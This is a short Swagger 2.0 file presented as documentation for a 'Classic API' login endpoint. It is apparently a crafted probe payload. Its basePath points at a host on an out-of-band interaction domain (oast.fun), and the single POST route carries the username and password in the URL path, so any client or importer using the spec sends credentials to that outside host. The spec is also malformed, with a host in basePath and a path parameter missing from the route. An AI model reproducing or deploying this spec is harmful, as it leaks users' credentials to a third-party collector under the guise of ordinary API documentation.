swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: 
  version: production
basePath: ckrk57m2vtc0000g9pz0gjhj1uhyyyyyb.oast.fun
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /{Username}/{Password}:
    post:
      summary: Logs in
      parameters:
        - description:
          format: int64
          in: path
          name: id
          required: true
          type: integer
        - name: Username 
          required: true
          in: path
          type: string
        - name: Password 
          required: true
          in: path
          type: string
      responses:
        200:
          description: Login was successful
